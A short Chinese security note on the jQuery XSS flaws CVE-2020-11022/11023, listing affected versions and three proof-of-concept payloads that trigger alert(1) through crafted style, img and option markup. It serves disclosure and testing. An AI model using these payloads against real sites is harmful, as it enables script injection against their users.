JQuery XSS漏洞(CVE-2020-11022/11023)

该漏洞源于WEB应用缺少对客户端数据的正确验证。

影响版本:

 1.2.0 <= jquery < V 3.5.0

测试代码:




    
    jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)
    





jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)

PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語

PoC 1

<style><style /><img src=x onerror=alert(1)>

PoC 2 (Only jQuery 3.x affected)

<img alt="<x" title="/><img src=x onerror=alert(1)>">

PoC 3

<option><style></option></select><img src=x onerror=alert(1)></style>

你可能感兴趣的